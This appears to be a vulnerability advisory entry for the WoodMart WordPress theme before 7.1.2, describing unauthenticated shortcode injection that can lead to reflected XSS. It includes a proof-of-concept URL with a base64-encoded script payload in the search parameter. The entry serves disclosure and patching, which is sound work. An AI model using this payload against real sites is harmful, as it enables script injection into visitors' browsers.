Themes Vulnerabilities
WoodMart < 7.1.2 - Unauthenticated Arbitrary Shortcode Injection
Description
The theme could allow arbitrary shortcode to be injected when the "Display results from blog" settings is enabled, which could lead to Reflected XSS for example, when using a shortcode vulnerable to XSS
Proof of Concept
When the "Display results from blog" settings is enabled: https://example.com/?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20&post_type=product&product_cat=lighting
Affects Themes
Fixed in 7.1.2
References
Classification
Type
INJECTION
OWASP top 10
CVSS
Miscellaneous
Original Researcher
FearZzZz
Verified
No
WPVDB ID
Timeline
Publicly Published
2023-02-16 (about 1 years ago)
Added
2023-03-01 (about 1 years ago)
Last Updated
2023-03-01 (about 1 years ago)